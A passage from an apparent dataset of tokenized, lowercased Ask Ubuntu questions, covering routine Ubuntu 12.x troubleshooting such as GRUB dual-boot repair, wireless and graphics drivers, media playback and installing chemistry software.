] what am i missing ?
250414	vlc player wont play avi or mp4	i 'm brand new to ubuntu ( and linux all together ) . i just installed ubuntu 12.10 on my lenovo s10e , and i 'm trying to play movies that i loaded from my external hd onto the netbook . i 've tried 4 different files , but none are working in either the standard ubuntu video player or vlc . the only thing that shows up is the vlc cone in the display window . i have no idea if the graphics driver was installed or not , and if it wasnt i dont know how to do that in ubuntu . i have 1.5gb of ram installed , so i doubt thats the issue . anyways , i 'm not very computer saavy , but i 'd appreciate any help . thanks you in advance .
250416	why am i not getting my ubuntu 12.10 login screen back after uninstalling xubuntu 12.10 ?	i installed xubuntu , then uninstalled it completely , but i am not getting my original log-in screen back . it 's a simple log-in screen with the computer 's icon , user name , password and session details in front of the default 12.10 background in a small log in window in the center . i want the original log in screen . ( dotted wallpaper with changing background as you change the user ) do i have to install ubuntu again to get the log-in screen back ?
250420	how do i install jchempaint ?	jchempaint is a java-based software designed for molecule editing . please tell me how to install it so that i can make a desktop icon for it . i have the java file downloaded so where do i go from here to achieve this ?
250421	is it possible to round the bottom corners of windows ?	i was just wondering if it was possible to make the bottom corners of windows in ubuntu 12.10 rounded , like a mac has . i did find this in the theme .xml file , but when i change it to true it does n't change anything . rounded_bottom_left= '' false '' rounded_bottom_right= '' false ''
250424	run ati and nvidia on the same computer	on the same pc i have an ati card with one monitor plugged and a nvidia with another monitor plugged and i work in dual monitor without problems on windows 7 . how i can do that in ubuntu 12.10 ? thanks
250426	how do i run a executable ( application/x-executable ) file ?	i just downloaded zodiac ( a chem software ) for linux and i tried using sudo bash ./zodiac_linux from the directory where it 's installed and i received the error : ./zodiac_linux : ./zodiac_linux : can not execute binary file i am running 12.10 if it 's relevant . running file zodiac_linux gives the output : zodiac_linux : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.8 , not stripped the output of locate libopenbabel is : /home/brentonhorne/build_babel/lib/libopenbabel.so /home/brentonhorne/build_babel/lib/libopenbabel.so.4 /home/brentonhorne/build_babel/lib/libopenbabel.so.4.0.2 /usr/lib/libopenbabel.so.4 /usr/lib/libopenbabel.so.4.0.1 /usr/local/lib/libopenbabel.so /usr/local/lib/libopenbabel.so.4 /usr/local/lib/libopenbabel.so.4.0.2 /usr/share/doc/libopenbabel4 /usr/share/doc/libopenbabel4/changelog.debian.gz /usr/share/doc/libopenbabel4/copyright /var/lib/dpkg/info/libopenbabel4.list /var/lib/dpkg/info/libopenbabel4.md5sums /var/lib/dpkg/info/libopenbabel4.postinst /var/lib/dpkg/info/libopenbabel4.postrm /var/lib/dpkg/info/libopenbabel4.shlibs
250427	how to configure samba not to share or not to disply shares ?	how can i configure samba so that i can connect to a workgroup with boxes with diffeerent op systems but not to share or hide the shares from other boxes ?
250433	how do i install cdk - the chemical development kit from the tarball ?	if you need to download the tarball yourself to know how to help me here 's the file . i 'm running 12.10 if it is relevant . i do n't know where to go in installing cdk i know the readme file says to run : cdk/ $ ls build.xml build.xml cdk/ $ ant in terminal . when i got to running build.xml from the extracted directory i received the error : build.xml : command not found the contents of the readme file are : cdk - the chemical development kit copyright 1997-2012 the cdk development team license : lgpl v2 , see doc/lgpl.license 1 . introduction you are currently reading the readme file for the chemistry development project ( cdk ) . this project is hosted under http : //cdk.sourceforge.net/ please refer to these pages for updated information and the latest version of the cdk . the cdk is an open-source library of algorithms for structural chemo- and bioinformatics , implemented in the programming language java ( tm ) . the library is published under terms of the the gnu lesser general public license v2 . this has implications on what you can do with sources and binaries of the cdk library . for details , please refer to the file license , which should have been provided with this distribution . please note : this is a library of useful data structures and algorithms to manipulate them from the area of structural chemo- and bioinformatics . as such , it is intended for the use by programmers , who wish to save some effort by reusing code . it is not intended for the enduser . if you consider yourself to be more like user , you might not find what you wanted . please refer to other projects like the jchempaint project ( http : //jchempaint.github.com/ ) or the jmol project ( http : //www.jmol.org/ ) for programs that actually take advantage of the cdk library . 2 . compiling compiling and jar-ing the software is done with jakarta 's ant ( http : //jakarta.apache.org/ant/ ) 1.7.1 or better and java 1.6.0 or better : cdk/ $ ls build.xml build.xml cdk/ $ ant '' ant -p '' gives a list of possible compilation targets . the default target is 'dist-all ' , which creates a number of .jar files in the 'dist ' directory corresponding to subsets of the cdk functionality . for convenience , one large .jar file containing everything can be created using the target 'dist-large ' ( using the command `` ant dist-large '' ) . this is also created in dist/jar and is typically named something like 'cdk-1.4.11.jar ' . 2.1 creating the javadoc documentation for the api the javadoc documentation for the api describes all of the cdk classes in detail . it functions as the user manual for the cdk , although you should also look at the list of examples and tutorials below . this documentation is created by 'ant ' from the java source code for the cdk as follows : cdk/ $ ls javadoc.xml javadoc.xml cdk/ $ ant -buildfile javadoc.xml html the documenation is created as a series of .html pages in doc/api . if you use firefox , you can read the documentation using the following command : cdk/ $ firefox doc/api/index.html 3 . running tests important : this requires the git version of the sources , because the test files are not included in the source code distribution . after you compiled the code , you can do `` ant test-all '' to run the test suite of non-interactive , automated tests . you might need to copy an appropriate junit.jar into your $ ant_home/lib directory or somewhere else in your classpath . upon `` ant dist-all test-dist-all test-all '' , you should see something like : test : running org.openscience.cdk.test.cdktests tests run : 1065 , failures : 7 , errors : 1 , time elapsed : 27,55 sec as you can see , the vast majority of tests ran successfully , but that there are failures and errors . the $ cdk_home/reports/results.txt file contains information about the outcome of the tests . there are also run interactive tests , like the controller2dtest . in order to try them , you can edit the `` run '' target in the build.xml file to look like this : < target name= '' run '' depends= '' dist '' > < java classname= '' org.openscience.cdk.test.controllertest '' fork= '' yes '' > < arg value= '' '' / > < classpath > < pathelement location= '' $ { dist } /jar/cdk.jar '' / > < pathelement path= '' $ { java.class.path } '' / > < pathelement location= '' . `` / > < fileset dir= '' jar '' > < include name= '' *.jar '' / > < /fileset > < /classpath > < /java > < /target > then , a `` ant run '' should give you a window where you can add bonds to a given structure . currently , there are more than 2500 test , of which a large part tests the data , datadebug and nonotify classes . you can run the tests for an individual module with ( for the core module ) : cdk/ $ ant -dmodule=core compile-module jartestdata test-module 4 . using cdk cdk is a class library intended to be used by other programs . it will not run as a stand-alone program , although it contains some gui- and command line applications . in order to use the cdk in your program , you need to build the distribution jars by running `` ant dist-all '' . they will end up in $ cdk_home/dist/jar . copy all cdk-*.jars as well as all jars from $ cdk_home/jar to the lib directory of the project for which you intend to have cdk support and use them as you would use any other third party jar . alternatively , run `` ant dist-large '' to create a jar cdk-svn-yyyymmdd.jar in $ cdk_home/dist/jar . this large jar contains all the cdk code and all third party libraries that code depends on . 5 . examples and tutorials to get started using the cdk , you may be interested in the following websites which contain examples and tutorials : * http : //pele.farmbio.uu.se/planetcdk/ * http : //rguha.net/code/java/ * http : //www.redbrick.dcu.ie/~noel/cdkjython.html and for updates on cdk use cases : * https : //plus.google.com/103703750118158205464/posts
250434	tracking data sent to remote host over time ?	what is a a good way to track over time the amount of data transferred from my ubuntu machine to another host on the internet ?
250435	stuck installing on win 8 laptop	i can get to the ubuntu screen , and installation begins ... .and then while it seems like everything is installing , everything starts to be removed and uninstalled . using a liveusb , and laptop preloaded w/ windows 8 . any ideas what i am doing wrong ? p.s- i can run in trial mode ...
250442	django installed , but ca n't import django in python	i 've installed django multiple ways , via apt-get and pip install . they all say i have the most recent version of django . now whenever i run python in terminal and type in import django , i receive importerror : no module named django however , when i run django-admin -- version i receive 1.4.3 i know it 's installed , but why is python not finding the django module ?
250446	weird change in theme	i 've had something really weird happen to my 12.04 . i was installing new desktop environments , and now i have no sound through my headphones and the `` pop up '' theme has changed . by pop up , i mean the icons that appear when i use hot keys to do things like change volume , brightness , etc . i first noticed this change after i left my computer on , but was away from it . i had n't logged out of my session , but the theme changed when i woke back up from suspend . the only other thing i had done was the regular update stuff with update manager . so , the question is how do i go back to how it was this morning ? at the very least , i can deal with the icons being different , but i need sound out my headphone jack ! here 's a pic https : //docs.google.com/file/d/0byutthf4cdvhve1xdf9ntehralk/edit ? usp=sharing thanks ! ! !
250448	youtube - could n't load plug-in	all of a sudden there 's this message of 'could n't load plug-in ' on chrome . firefox is fine though , i tried updating flashplayer but it did n't work . thoughts ?
250450	how do i install molsketch ?	i attempted to install molsketch by running make after running cmake at which point i received the output : [ 1 % ] building cxx object libmolsketch/src/cmakefiles/molsketch_lib.dir/stereocenteritem.cpp.o /home/brentonhorne/downloads/molsketch-0.2.0-source/libmolsketch/src/stereocenteritem.cpp : in member function ‘virtual void molsketch : :stereocenteritem : :paint ( qpainter* , const qstyleoptiongraphicsitem* , qwidget* ) ’ : /home/brentonhorne/downloads/molsketch-0.2.0-source/libmolsketch/src/stereocenteritem.cpp:66:17 : error : ‘stereogenicunit’ is not a member of ‘openbabel’ /home/brentonhorne/downloads/molsketch-0.2.0-source/libmolsketch/src/stereocenteritem.cpp:66:17 : error : ‘stereogenicunit’ is not a member of ‘openbabel’ /home/brentonhorne/downloads/molsketch-0.2.0-source/libmolsketch/src/stereocenteritem.cpp:66:43 : error : template argument 1 is invalid /home/brentonhorne/downloads/molsketch-0.2.0-source/libmolsketch/src/stereocenteritem.cpp:66:43 : error : template argument 2 is invalid /home/brentonhorne/downloads/molsketch-0.2.0-source/libmolsketch/src/stereocenteritem.cpp:66:51 : error : invalid type in declaration before ‘=’ token /home/brentonhorne/downloads/molsketch-0.2.0-source/libmolsketch/src/stereocenteritem.cpp:66:97 : error : can not convert ‘openbabel : :obstereounitset { aka std : :vector < openbabel : :obstereounit > } ’ to ‘int’ in initialization /home/brentonhorne/downloads/molsketch-0.2.0-source/libmolsketch/src/stereocenteritem.cpp:68:40 : error : request for member ‘size’ in ‘units’ , which is of non-class type ‘int’ /home/brentonhorne/downloads/molsketch-0.2.0-source/libmolsketch/src/stereocenteritem.cpp:69:17 : error : request for member ‘at’ in ‘units’ , which is of non-class type ‘int’ /home/brentonhorne/downloads/molsketch-0.2.0-source/libmolsketch/src/stereocenteritem.cpp:70:62 : error : request for member ‘at’ in ‘units’ , which is of non-class type ‘int’ /home/brentonhorne/downloads/molsketch-0.2.0-source/libmolsketch/src/stereocenteritem.cpp:73:17 : error : request for member ‘at’ in ‘units’ , which is of non-class type ‘int’ /home/brentonhorne/downloads/molsketch-0.2.0-source/libmolsketch/src/stereocenteritem.cpp:74:62 : error : request for member ‘at’ in ‘units’ , which is of non-class type ‘int’ make [ 2 ] : *** [ libmolsketch/src/cmakefiles/molsketch_lib.dir/stereocenteritem.cpp.o ] error 1 make [ 1 ] : *** [ libmolsketch/src/cmakefiles/molsketch_lib.dir/all ] error 2 make : *** [ all ] error 2 the output of cmake was : -- unit testing enabled , run make test to run them -- found openbabel trunk with graphsym.h qt qtassistant library not found . creating /home/brentonhorne/downloads/molsketch_build/libmolsketch/src/include/molsketch uis = /home/brentonhorne/downloads/molsketch-0.2.0-source/libmolsketch/src/mechanismarrowdialog.ui ; /home/brentonhorne/downloads/molsketch-0.2.0-source/libmolsketch/src/reactionarrowdialog.ui qt qtassistant library not found . uis = /home/brentonhorne/downloads/molsketch-0.2.0-source/molsketch/src/settings.ui ; /home/brentonhorne/downloads/molsketch-0.2.0-source/molsketch/src/drawwidget.ui -- test : valence -- configuring done -- generating done -- build files have been written to : /home/brentonhorne/downloads/molsketch_build
250451	problems with screen resolution	ok ... so i am running ubuntu 12.10 . i installed a nes emulator from the software center . i downloaded a rom , played it , and everything worked fine . i decided to run in full screen mode ( because it 's not fun playing on a 2-inch screen ) and it properly switched resolution to 640*480 to run in full screen mode . then , being used to windows , i used alt+enter to exit full screen mode . the program closed and i was at my desktop , but it was in 640*480 still . i went to system settings , display , and changed to the proper resolution . when i clicked apply , though , the screen went black , and acted like there was no signal . i reset my computer , and it started again , but was still in 640*480 . is there any way i can change back to my monitor 's default resolution ? edit : : i just had to go into terminal and type : '' xrandr -s 1280x1024 ''
250458	can not disable keyring prompt . all researched solutions do not work	i am on 12.10 . the keyring password prompt continues to bombard me , and i have tried many solutions that i have read here on the site and all over the internet . i go to seahorse and there are no options whatsoever to do anything with , and any commands in terminal that i have tried regarding this do not work either . please help anyone , i have been working on this forever and it is driving me insane .
250460	what is the difference between / directory and /root director ?	in ubuntu filesystem , there is a / directory which is called to be root directory and then again in that / directory there is a directory literally named root , what is the difference between them ?
250464	i have to choose twice on dual boot if i choose to boot ubuntu	i installed ubuntu 12.04 on my laptop to dual-boot it with windows 7 that has already been installed . then i used easybcd to configure it . when i choose windows 7 in the menu , it boots directly to windows . when i choose ubuntu , however , grub2 screen appears and i have to choose ubuntu again . how can i prevent that from happening ?
250467	ca n't work with files named with russian characters	after saving file in libreoffice with russian name it displays in nautilus like `` ? ? ? ? ? ? .odt '' . this file correctly opens in libreoffice , but with `` ? ? ? ? ? ? .odt '' title in titlebar . another side of problem - when i create file with russian name in nautilus ( for example , i 'm renaming english filename in russian ) , it does n't open in libreoffice with an error `` /home/ ... ./ ? ? ? ? ? ? ? .odt does n't exists '' . in nautilus filename displays correctly . the error also involves dropbox - it does n't sync files with russian filenames , but dropbox agent shows `` all files up to date '' . the error exists not only in home folder , but in whole local filesystem ( i tried it in /tmp folder ) . there are russian keyboard layout and regional formats installed in system , but i 'm using english interface . is it can be a source of problem ? currently i 'm using ubuntu gnome remix 12.10 x64 , installed with default settings ( first of all , i mean hard drive formatting settings ) using encrypted home folder ( i 've marked this option in ubuntu installer ) . there is no such problem in ubuntu 12.04 x64 ( but without home folder encryption ) , i 've used before . is it bug of these programs or problem with encryption ? what can i do with it ?
250471	no sound through tv over hdmi	my issue is that i ca n't get the sound in my tv which i connected via hdmi . i used ubuntu 12.10 and ati hd6770 . i 'm totally new in ubuntu . who can help me ?
250474	how does ubuntu handle installing grub2 to a partition ?	i am currently dual-booting windows and linux ( not ubuntu ) , and i am looking to encrypt my windows partition with truecrypt . the truecrypt bootloader must be installed on the mbr , so it will displace grub . i have read from numerous sources that installing grub to a partition is a bad idea , but it is the only solution for my setup . while i was playing with ubuntu in a virtual machine , i found that it will install grub onto a partition 's boot sector without complaint when you choose the advanced partitioning option during installation . how does ubuntu perform this installation ? i would like to know enough detail so that i may move the concept to any distribution that uses grub2 .
250476	install wireless drivers on a dell e1505 manually	so i 'm trying to install the broadcom bcm4311 driver on 12.10 but the thing is that i do n't have any way to use ethernet to actually download it . luckily i 'm dual booting it with windows so i can download whatever i need from there and put it on my flash drive , so can anyone point me to the download page on where i can get the required packages ? i need some instructions on how to do this .
250478	what is the `` multiply/divide key '' mentioned by the ubuntu installer ?	i notice that the installer for ubuntu server 12.04.1 lts contains an option that appears to allow you to toggle between more than one keyboard layout : english ( us ) - english ( layout toggle on multiply/divide key ) however , there is no information about this shown in the installer , and i ca n't find anything useful online . i regularly switch back and forth between the us and us dvorak keyboard layouts , and think it would be very useful to be able to toggle between layouts . how does this work , and what is this `` multiply/divide '' key mentioned by the installer ? when i select this option , the installation appears to proceed with the us keyboard layout . the install completed successfully , and continues to be in standard us keyboard mode .
250481	lubuntu 12.10 amd 64bit live usb/dvd didnt worked in dell inspiron n5050 laptop	i tried lubuntu 12.10 live usb /dvd on my dell inspiron n 5050 laptop it didnt worked so but after boot screen it does n't work only logo of lubuntu displays on screen and then stopped . so is my hardware uncompatible or some other issue ? and it doesnt boot from usb n dvd live on my hardware open suse 12.2 x86-64 bit , ubuntu 12.04 n 12.10 64bit , linux mint cinnamon 64 bit , debian squueze 6 , scientific linux 6.3 , kahel0s i686 , pc bsd x64 , netrunner 12.12 amd 64 bit , backtrack 5r3-kde 32 bit , actually i installed on my hardware all this os just worked fine on my laptop , all worked fined but lubuntu live dvd didnt boot on my laptop please help i really want to use it . right now i 'm dual booting windows 7 with mageia 2 kde x86-64 iso it works like charm.. hardware overview processor intel ( r ) pentium ( r ) cpu b940 @ 2.00ghz video intel corporation 2nd generation core processor family integrated graphics controller network atheros communications , inc. ar3011 bluetooth network realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller the following components are contained in the dell inspiron 15 n5050 laptop , which has been awarded the status of certified for ubuntu . audio intel corporation 6 series/c200 series chipset family high definition audio controller bluetooth atheros communications , inc. ar3011 bluetooth atheros communications , inc. ar3011 bluetooth cdrom tsstcorp dvd+-rw ts-l633j optiarc dvd+-rw ad-7717h unknown optiarc dvd+/-rw ad-7717h capture suyin corp. 064e:8123 ( usb ) unknown intergrated webcam disk generic- multi-card unknown wdc wd5000bpvt-75hxzt1 pqi pqi usb flash drive adata adata usb flash drive mushkin mknufdpr2gb keyboard unknown at translated set 2 keyboard mouse unknown dualpoint stick unknown pixart usb optical mouse unknown imps/2 alps glidepoint network realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller atheros communications , inc. ar3011 bluetooth other sanyo dell 4yrjh15 unknown hci0 unknown dell-wifi unknown i8042 kbd port unknown i8042 aux port unknown hda intel pch unknown power button unknown video bus unknown hda intel pch hdmi/dp , pcm=3 unknown hda intel pch mic at ext left jack unknown hda intel pch hp out at ext left jack scsi realtek semiconductor corp. rts5138 card reader controller power quotient international co. , ltd 3538:0901 ( usb ) kingston technology company inc. 13fe:3600 ( usb ) a-data technology co. , ltd. c906 flash drive touch unknown alpsps/2 alps dualpoint touchpad usb intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 unknown intel corporation 6 series/c200 series chipset family 6 port sata ahci controller intel corporation 6 series/c200 series chipset family pci express root port 1 intel corporation 6 series/c200 series chipset family mei controller # 1 intel corporation hm67 express chipset family lpc controller pnp ibm enhanced keyboard controller ( 101/2-key ) unknown 118c:0504 ( pnp ) pnp 41d0:0a08 ( pnp ) pnp at real-time clock pnp motherboard registers pnp acpi control method battery pnp acpi power button device pnp pci interrupt link device pnp 41d0:0c14 ( pnp ) int 25d4:340e ( pnp ) linux foundation 2.0 root hub pixart imaging , inc. optical mouse unknown 0000 ( ata_device ) intel corporation 2nd generation core processor family dram controller video intel corporation 2nd generation core processor family integrated graphics controller wireless atheros communications inc. ar9285 wireless network adapter ( pci-express )
250482	ubuntu live boot 12.10 with usb hangs	i 've been a good ubuntu user since 11.4 on my 64bit dell inspiron n4010 laptop , and everytime installed with usb stick but this time , i ca n't install ubuntu 12.10 on my laptop . i had this issue again but then the networking solution did n't work since 12.10 , so everytime it happened i made an upgrade on my existing installation and it just worked . but now i ca n't fix it , because the usb live ubuntu is not booting up and it hangs on the splash screen . here 's the logs : https : //drive.google.com/folderview ? id=0b_gwe3dlpmpwnefbvtnoafvbn1u & usp=sharing i thought it might be because of my swap partition , because on any mode on in the recovery menu ( from friend recovery ) it hanged on fsck , so i just removed my swap partition and removed the /etc/fstab entry for the swap . not sure it was the right way , but it did n't change anything . the usb works perfectly with a dell latitude e6500 laptop , even though i get the not a typewriter message . as i researched the ' can not mount to /dev/sr0 , no medium found ' is also ok . note that i do n't want to remove all my partitions and make a clean install , that 's gon na be my last resort . any keyboard shortcut wo n't after that . up and down arrows that shows the splash screen wo n't work after it 's hung . alt + ctrl + f1-7 wo n't do anything . same goes to alt + ctrl + delete . one more thing is that having persistent storage or not having it , would n't make any difference . i made the usb with dd but , same results obtained with unetbootin or pendrivelinux . i cross posted this to ubuntu forums .
250493	how to install asus wlan wl167g driver on xbuntu 12.10	hi i am pretty new to ubuntu , i have just installed the xubuntu version 12.10 everything is working fine except my wireless internet connection . i have a asus wlan wl167g usb wireless adapter on my laptop . but i dont know how i can make it to work . details : bus 002 device 006 : id 0b05:1723 asustek computer , inc. wl-167g v2 802.11g adapter [ ralink rt2571w ] i think it requires the rt73 drivers but not sure how i can install it and get it to work . i will be much obliged if someone can help me with this . how i can use it ?
250495	how to get ubuntu installed , when my laptop restarts without installing ?	i 'm trying to install ubuntu from usb flash . so i boot from it and the install begins . it works until it ask me which type of instillation i want . i choose alongside with windows 7 and then it the computer restarts and windows 7 runs without ubuntu being installed ! i tried this installation several times and every time i get the same problem . how can i fix this problem and get ubuntu to install ?
250504	i can not boot ubuntu unless i disconnect everything from usb 3.0 port	few days before , i have upgraded my os from 12.04 to ubuntu 14.04 64-bit ( i had the same problem on 13.10 ) . ever since that , when i try to boot my notebook with any usb cable connected to usb 3.0 port , the screen just remains black and nothing happens and i have to reboot my notebook by force ( holding power button ) . with no cable connected , ubuntu loads just fine and connecting anything to usb 3.0 is not an issue anymore . i guess , that it freezes before the kernel is loaded , because when i tried to reboot the computer using alt + screen + b , nothing happened.i was experiencing these difficulties even on the previous version , but just sometimes . i am running dell vostro 3750 . please , does anyone have any idea , what may be causing this ? edit : maybe i should have also included note , that it freezes after i choose in grub boot menu , what should be booted . but not promptly after i select it . for about 5 seconds computer seems to be doing something ( disk control is blinking ) . edit : as requested , i am posting output from sudo blkid : /dev/sda1 : uuid= '' 499931f2-2f83-4353-8160-9a48a5ee1878 '' type= '' ext4 '' /dev/sda5 : uuid= '' f0ad1205-6b52-4990-bb7b-543d53d969c5 '' type= '' swap '' /dev/sdb1 : label= '' rezervovm-cm- ! no systm-cm- ) mem '' uuid= '' e03eb4fa3eb4cab4 '' type= '' ntfs '' /dev/sdb2 : uuid= '' ee2ac63d2ac60317 '' type= '' ntfs '' /dev/sdb4 : label= '' data '' uuid= '' 8cc631c4c631aef8 '' type= '' ntfs '' /dev/sdb5 : uuid= '' babe1371-f48f-4b95-a93a-360bcec268b3 '' type= '' ext4 '' and my grub.cfg is avalible here : http : //sharetext.org/vvob
250508	unable to start jack server ? service is available ( org.jackaudio.service aka jackdbus ) .	im trying to start jackd using qjackctl but it fails with error messages here is what i 'm seeing - 14:36:48.194 patchbay deactivated . 14:36:48.198 statistics reset . 14:36:48.228 alsa connection change . 14:36:48.241 d-bus : service is available ( org.jackaudio.service aka jackdbus ) . can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started registered event listener change listener : true 14:36:48.258 alsa connection graph change . 14:37:12.679 d-bus : jack server could not be started . sorry can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started qspiaccessible : :accessibleevent not handled : `` 2 '' obj : qmessagebox ( 0xbfd7c2d0 ) `` '' fixme : handle dialog start . sat feb 2 14:37:12 2013 : starting jack server ... sat feb 2 14:37:12 2013 : jack server starting in realtime mode with priority 10 sat feb 2 14:37:12 2013 : [ 1m [ 31merror : can not lock down 82241434 byte memory area ( can not allocate memory ) [ 0m sat feb 2 14:37:12 2013 : control device hw:0 sat feb 2 14:37:12 2013 : control device hw:0 sat feb 2 14:37:12 2013 : [ 1m [ 31merror : failed to acquire device name : audio0 error : can not allocate memory [ 0m sat feb 2 14:37:12 2013 : [ 1m [ 31merror : audio device hw:0 can not be acquired ... [ 0m sat feb 2 14:37:12 2013 : [ 1m [ 31merror : can not initialize driver [ 0m sat feb 2 14:37:12 2013 : [ 1m [ 31merror : jackserver : :open ( ) failed with -1 [ 0m sat feb 2 14:37:12 2013 : [ 1m [ 31merror : failed to open server [ 0m sat feb 2 14:37:13 2013 : saving settings to `` /home/soham/.config/jack/conf.xml '' ... fixme : handle dialog end . 14:37:17.923 could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started qspiaccessible : :accessibleevent not handled : `` 2 '' obj : qmessagebox ( 0xbfd7cb40 ) `` '' fixme : handle dialog start . fixme : handle dialog end . qspiaccessible : :accessibleevent not handled : `` 6 '' obj : qmenu ( 0x8d0f0a0 ) `` '' note : if i restart my machine `` jack '' start working again until i play something , like movies or songs etc using vlc or any other media player .
250510	how to install huawei e177 ( usb modem ) on ubuntu 12.10	i have been using ubunt12.10 with amd fx8350 . when i connect huawei e177 ( usb modem ) , it does not detect it . please help me installing this data card . thanks inadvance
250511	wifi is not working in xubuntu 12.10	my laptop is dell vostro 2520 . i tried both xubuntu and ubuntu on it , i 've used 12.04 & 12.10 . wifi fails to work in all the cases - when i try to switch wifi by a hotkey ( fn+f2 ) the bluetooth icon appears in the system tray but the light for the wifi on lower left corner panel does n't turn on . i tried the solution of connecting to the network via cable : sudo apt-get install linux-headers-generic sudo apt-get install -- reinstall bcmwl-kernel-source sudo modprobe wl from the similar thread ubuntu 12.10 , wireless not working could you help me ? many thanks in advance ! update 1 it was n't clear to me is @ mikewhateve talking about one or two commands in the console . i tried both halfros @ halfros-vostro-2520 : ~ $ lspci -nn | grep net , rfkill list all grep : rfkill : no such file or directory grep : list : no such file or directory grep : all : no such file or directory halfros @ halfros-vostro-2520 : ~ $ lspci -nn | grep net 07:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) halfros @ halfros-vostro-2520 : ~ $ rfkill list all halfros @ halfros-vostro-2520 : ~ $ update 2 $ sudo dpkg -i | grep bcmwl-kernel-source dpkg : error : -- install needs at least one package archive file argument type dpkg -- help for help about installing and deinstalling packages [ * ] ; use `dselect ' or `aptitude ' for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; options marked [ * ] produce a lot of output - pipe it through `less ' or `more ' ! halfros @ halfros-vostro-2520 : ~ $ update 3 dpkg -l grep bcmwl-kernel-source desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-==============-============-============-================================= ii grep 2.12-2 amd64 gnu grep , egrep and fgrep dpkg-query : no packages found matching bcmwl-kernel-source
250515	screen dependent image resolution	i 'm currently reading some articles about qml , qtquick and the soon coming ubuntu sdk and i 'm wondering if there are any mechanism that allow a device resolution dependent selection of image resolutions . for example android provides a very simple directory structure that differentiate between low resolution devices and high resolution devices , so i just ship different version of the same image with my app and android decides which is the best one for the currently used device . so the question is how i could support different screen resolutions in applications that use images as backgrounds or button labels ?
250518	grub missing after bootmgr repair	i had an issue in grub where it said bootmgr missing when i selected my windows 7 option . so i slapped in my windows 7 disk , launched startup repair and now windows worked , however , it boots up directly into windows and grub does not come up .
250531	lenovo x1 - hdmi output	i 'm facing problems with hdmi output to my tv ( ﾃ僕evia hd-tv ) . when i connect hdmi cable computer / tv i can see the detect each other , and on display configuration i can see the other display , but for some reason it does n't work . on tv i can see the message `` invalid format '' . lspci |grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) sudo lshw -c display ; lsb_release -a ; uname -a ; sudo dmidecode -t 1 [ sudo ] password for ru : *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:48 memory : f0000000-f03fffff memory : e0000000-efffffff ioport:5000 ( size=64 ) no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise linux laptop_ru 3.2.0-37-generic # 58-ubuntu smp thu jan 24 15:28:10 utc 2013 x86_64 x86_64 x86_64 gnu/linux # dmidecode 2.11 smbios 2.6 present . handle 0x000f , dmi type 1 , 27 bytes system information manufacturer : lenovo product name : 1291a11 version : thinkpad x1 wake-up type : power switch sku number : not specified family : thinkpad x1
250533	ubuntu 12.10 64bit no /usr/lib32/ ?	i am currently trying to setup wine properly in ubuntu 12.10 . the error that i am trying to fix is : p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory '' i have found several posts here which say that i have to create a symlink to the 32bit lib but when i look for /usr/lib32 on my system then i see that i dont have any lib32 directory . i tried to install the 32 libs with : sudo dpkg -- add-architecture i386 sudo apt-get update sudo apt-get install ia32-libs terminal says i have already the newest version . but i still do n't have any /usr/lib32 directory . i hope anyone can help me with that issue .
250536	windows 7 not booting after installing ubuntu 12.04 from wubi	i tried installing ubuntu 12.04 using live cd on my laptop ( lenovo z580 ) which came with windows7 pre-installed . while installing , i created partitions for root ( 15gb ) as sda1 and swap ( 4gb ) as sda2 . after successful installation of ubuntu and after a reboot , i re-installed the grub . after much changes , following the suggestions of linux forums , re-installing and updating the grub , i am now at a stage where the grub shows the options for ubuntu 12.04 and windows7 , with ubuntu working fine . this is the procedure that i used to get the grub entry : i used option 2 in here : http : //ubuntuguide.net/how-to-restore-grub-2-after-reinstalling-windows-xpvistawin7 wiz , boot up ubuntu from the livecd , open terminal and run : sudo -i mount /dev/sda7 /mnt mount /dev/sda6 /mnt/boot # skip this one if not have a separate /boot partition grub-install -- root-directory=/mnt/ /dev/sda if you miss âgrub.cfgâ file , use following to recreate : mount -- bind /proc /mnt/proc mount -- bind /dev /mnt/dev mount -- bind /sys /mnt/sys chroot /mnt update-grub umount /mnt/sys umount /mnt/dev umount /mnt/proc exit upon selecting windows7 , i get : error : device not found ... < uuid > ... error : file not found please help me solve the issue . my boot-info summary result file can be found below : > **boot info script 0.61 [ 1 april 2012 ] ** -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ** > > > ============================= boot info summary : =============================== > > = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of > the same hard drive for core.img . core.img is at this location and looks > for ( , msdos1 ) /boot/grub on this drive . > > sda1 : __________________________________________________________________________ > > file system : ext4 > boot sector type : - > boot sector info : > operating system : ubuntu 12.04 lts > boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img > > sda2 : __________________________________________________________________________ > > file system : swap > boot sector type : - > boot sector info : > > ============================ drive/partition info : ============================= > > drive : sda _____________________________________________________________________ > > disk /dev/sda : 750.2 gb , 750156374016 bytes > 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors > units = sectors of 1 * 512 = 512 bytes > sector size ( logical/physical ) : 512 bytes / 4096 bytes 